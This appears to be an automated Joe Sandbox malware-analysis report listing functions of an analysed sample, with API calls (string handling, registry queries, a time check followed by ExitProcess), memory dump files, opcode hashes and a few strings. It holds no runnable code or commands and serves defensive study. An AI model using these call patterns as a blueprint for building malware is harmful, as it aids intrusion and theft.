                        Function 00462400 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlenmemset
                        • String ID:
                        • API String ID: 3212139465-0
                        • Opcode ID: aec3946f76839f0971bac5a6439d1d09a35cfbc684aad1545e7ecf43439baf3f
                        • Instruction ID: 0eb430d4823153b550abd64859026b1d9eb53b25837fbd0425cc62ae3a4ea4a4
                        • Opcode Fuzzy Hash: aec3946f76839f0971bac5a6439d1d09a35cfbc684aad1545e7ecf43439baf3f
                        • Instruction Fuzzy Hash: 7C81F6B0E00205ABDB14DF95CD44BAEB7B5AF84304F14817EE509A7381FBB99D41CB9A
                        Function 00457EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00457F31
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00457F60
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 00457FA5
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 00457FD3
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 00458007
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 3235a4e0e80d75ea6c3764523c8cd0db956d13d0a1ccb1fa67da89c83936ca27
                        • Instruction ID: e721cd96565e563b0cabf8314324cba0aab6d1b2aa151afc5ba42ba6f168b150
                        • Opcode Fuzzy Hash: 3235a4e0e80d75ea6c3764523c8cd0db956d13d0a1ccb1fa67da89c83936ca27
                        • Instruction Fuzzy Hash: B041C531604106DFCB20DF58E480EAE77F4FF59301B11416AE805D7352DB78EA5ACB95
                        Function 00458050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 004580BB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004580EA
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 00458102
                        • lstrlen.KERNEL32(00000000), ref: 00458140
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045816F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: f8107ff241c7db44d1c1612d61d14da214af00900e7704085611f14ab59f91fc
                        • Instruction ID: 4990fc02d9379fc747e0d8dd432c4d156e590e0d16be23da6eabf1ae77d39704
                        • Opcode Fuzzy Hash: f8107ff241c7db44d1c1612d61d14da214af00900e7704085611f14ab59f91fc
                        • Instruction Fuzzy Hash: FC418C71600106ABDB21DF78D944BABBBF4EB44701F11841EAC49E7346EF38D94ACB94
                        Function 00461B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00461B72
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0046184F
                          • Part of subcall function 00461820: lstrlen.KERNEL32(015772C8), ref: 00461860
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,00000000), ref: 00461887
                          • Part of subcall function 00461820: lstrcat.KERNEL32(00000000,00000000), ref: 00461892
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,00000000), ref: 004618C1
                          • Part of subcall function 00461820: lstrlen.KERNEL32(00474FA0), ref: 004618D3
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,00000000), ref: 004618F4
                          • Part of subcall function 00461820: lstrcat.KERNEL32(00000000,00474FA0), ref: 00461900
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,00000000), ref: 0046192F
                        • sscanf.NTDLL ref: 00461B9A
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00461BB6
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00461BC6
                        • ExitProcess.KERNEL32 ref: 00461BE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                        • String ID:
                        • API String ID: 3040284667-0
                        • Opcode ID: 731e704e665aa84167829278ee6569118bb43f75c1ca18fe6865c1e92f52021e
                        • Instruction ID: caab436a6ca45f6d4af34c6915c80bc0b32bc4c5d8f003d6f687d2b5de74d6fb
                        • Opcode Fuzzy Hash: 731e704e665aa84167829278ee6569118bb43f75c1ca18fe6865c1e92f52021e
                        • Instruction Fuzzy Hash: EB21E2B1518301AF8354EF69D88485FBBF9EED9314F409A1EF599C3220E734E5088BA7
                        Function 00463130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00463166
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0046316D
                        • RegOpenKeyExA.ADVAPI32(80000002,0157BEF8,00000000,00020119,?), ref: 0046318C
                        • RegQueryValueExA.ADVAPI32(?,0158D730,00000000,00000000,00000000,000000FF), ref: 004631A7
                        • RegCloseKey.ADVAPI32(?), ref: 004631B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 32b6cae0f90a5d798a4b25009c1c030a14e465421e813c2ef6efcb6da1f05b72
                        • Instruction ID: 1246a7a88556a297478dba3afd7acbb7c9bd201da618326acd9d115402587ed1
                        • Opcode Fuzzy Hash: 32b6cae0f90a5d798a4b25009c1c030a14e465421e813c2ef6efcb6da1f05b72
                        • Instruction Fuzzy Hash: E1114276A40205AFD714CF94DD49FBBB7BDE744721F10421AFA09E3780DB7559408BA1
                        Function 00448980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00448996
                          • Part of subcall function 0046A1C0: std::exception::exception.LIBCMT ref: 0046A1D5
                          • Part of subcall function 0046A1C0: std::exception::exception.LIBCMT ref: 0046A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 004489CD
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: invalid string position$string too long
                        • API String ID: 2002836212-4289949731
                        • Opcode ID: 81c324f1f6c3e950b66240bd06ce8f55aff58c59096f6d1b6ed0f260ed498598
                        • Instruction ID: 176fec820fbe9d5c8fae938e56940544a74ee6d5d56bbdd37565db63cec66975
                        • Opcode Fuzzy Hash: 81c324f1f6c3e950b66240bd06ce8f55aff58c59096f6d1b6ed0f260ed498598
                        • Instruction Fuzzy Hash: FE21D872300A504BE720DA5CE840A6EF795DBA2765B14093FF141CB341DBB5DC41C7AE
                        Function 00448850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00448883
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 39db1d148e19fb72ccd3ef6d8f9b7596fbea4df4b8aec231f270161f7f76225e
                        • Instruction ID: 1ee76f98a1540c3722b44923f225ee604e8afe297303586aaaf37124ffb1639d
                        • Opcode Fuzzy Hash: 39db1d148e19fb72ccd3ef6d8f9b7596fbea4df4b8aec231f270161f7f76225e
                        • Instruction Fuzzy Hash: E331B7B5E005199FCB08DF58C8916AEBBB6EB88350F14826EE905EB344DB34AD01CB95
                        Function 00465910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465922
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465935
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_std::exception::exception
                        • String ID: Sec-WebSocket-Version: 13$string too long
                        • API String ID: 1928653953-3304177573
                        • Opcode ID: 05aa31046518d5b87bc9fe7fff24e227387b47e38e35d1ef9db86cebb643c593
                        • Instruction ID: b647ac24c53424bfb3322dc331b0db6c313baeaccb19d31252218173587f2e7c
                        • Opcode Fuzzy Hash: 05aa31046518d5b87bc9fe7fff24e227387b47e38e35d1ef9db86cebb643c593
                        • Instruction Fuzzy Hash: FC118E70304B40CBC7318B2CE900B1AB7E1ABD2760F250A5FE0D187795E769E849C7AA
                        Function 00463CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0046A430,000000FF), ref: 00463D20
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00463D27
                        • wsprintfA.USER32 ref: 00463D37
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 2bc92569200d2f4b11672df23abd8692008890971aa82d8b6bc24bb48210ba26
                        • Instruction ID: 4441a5082c73b1a9dbdc4cc26afa4c80e3d6dffb0d8603ef4cf5a8c3a33e196a
                        • Opcode Fuzzy Hash: 2bc92569200d2f4b11672df23abd8692008890971aa82d8b6bc24bb48210ba26
                        • Instruction Fuzzy Hash: 2101D271A90700BFE7145B55DC0EF6ABBB9FB45B61F10011AFA09972D0DBB81D40CAB6
                        Function 0046926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 00469279
                          • Part of subcall function 004687FF: __amsg_exit.LIBCMT ref: 0046880F
                        • __amsg_exit.LIBCMT ref: 00469299
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
